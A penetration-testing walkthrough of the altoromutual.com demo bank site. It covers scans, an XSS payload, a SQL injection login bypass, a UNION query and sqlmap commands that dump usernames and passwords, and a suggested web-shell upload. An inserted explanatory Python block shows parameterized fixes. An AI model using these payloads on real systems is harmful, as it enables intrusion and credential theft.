Report www.altoromutual.com:
  1. Find the IP address, add it to scope (Burp) and scan the site:
    nikto -h www.altoromutual.com / nmap -sV 65.61.137.117

NMAP:
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.0
443/tcp open ssl/http Microsoft IIS httpd 8.0
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NIKTO:
Retrieved x-powered-by header: ASP.NET
Server: Microsoft-IIS/8.0
Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST

OSVDB-3092: /admin.htm: This might be interesting...
OSVDB-3092: /bank/: This might be interesting...
  2. Check the website and try to find more information about the application.
  3. Reflected XSS was found in the search box:
    try to insert <script>alert()</script> or <script>a()</script>
    I can find my XSS in the source code.

  4. Try to sign in and view the source.
  5. Try to sign in with an invalid username: user' password: 3456
    We get an error (another injection point).
    Look inside the error: it reveals the local application path.

  6. The syntax is wrong; find a syntax that evaluates true and try to sign in:
    user' or 1=1-- - (the password is not relevant and we will be logged in as the first user).
  7. Success! Check the users.

  8. Try to find another injection point in the application:
    insert something into the date boxes and check the code.
  9. The script is filtered,
    and "order by" does not work either.
  10. 1 union select 1,2,3,4 from users-- - (working!)

Try to use: 1 union select 1,username,password,4 from users-- -
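To show why the two injection points above work (the sign-in bypass and the four-column UNION in the date filter) and what the application-side fix looks like, here is an added example; it is not code from this writeup or from the Altoro Mutual application, and it assumes a SQLite stand-in for the Access database with constructed table and column names.

```python
import sqlite3

# Constructed stand-in for the bank's users and transactions tables. The page's
# target runs on Microsoft Access; SQLite is used here only so the demo runs offline.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (userid INTEGER, username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin-pw-constructed", "admin"),
        (2, "jsmith", "demo1234", "user"),
    ])
    con.execute("CREATE TABLE transactions (tid INTEGER, userid INTEGER, amount REAL, tdate TEXT)")
    con.execute("INSERT INTO transactions VALUES (1, 1, 100.0, '2020-01-05')")
    return con

def login_vulnerable(con, username, password):
    # String-built query, which is what the sign-in error on the page points to.
    # With the payload user' or 1=1-- - the WHERE clause is always true and the
    # trailing comment swallows the password check, so every row comes back and
    # the application logs in as the first one (admin).
    sql = ("SELECT userid, username FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return con.execute(sql).fetchall()

def login_fixed(con, username, password):
    # Bound parameters: the same payload is compared as a literal username string.
    sql = "SELECT userid, username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()

def transactions_vulnerable(con, userid):
    # Four-column query behind the date filter; because the column count matches,
    # 1 union select 1,username,password,4 from users-- - appends the users table.
    sql = ("SELECT tid, userid, amount, tdate FROM transactions "
           "WHERE userid = %s" % userid)
    return con.execute(sql).fetchall()

def transactions_fixed(con, userid):
    # Validate the type first, then bind it: a UNION payload is rejected
    # (ValueError) before any SQL is built.
    uid = int(userid)
    sql = "SELECT tid, userid, amount, tdate FROM transactions WHERE userid = ?"
    return con.execute(sql, (uid,)).fetchall()
```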

There is another way:

  1. Save the valid (payload) id and password from Burp into a file:
    uid=* &passw=123&btnSubmit=Login > /tmp/1.log
  2. Use sqlmap to find the users and passwords:
    sqlmap -l /tmp/1.log --prefix="'" --suffix="-- -" -p uid --technique b
    • DBMS is Microsoft Access.
  3. sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 --tables

sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 -T users -C username --dump
[11:38:21] [WARNING] on Microsoft Access it is not possible to enumerate the user password hashes

Change to:
sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 --common-tables

sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 -T users -C user,password --dump

Looking for a writable location:
Fill in the form and stop the request with Intercept (Burp).

check: www.altoromutual.com/comment.txt
We can see the user input there, which means we have a writable point: upload a web shell and URL-encode it.

Fabio Lior Rahamim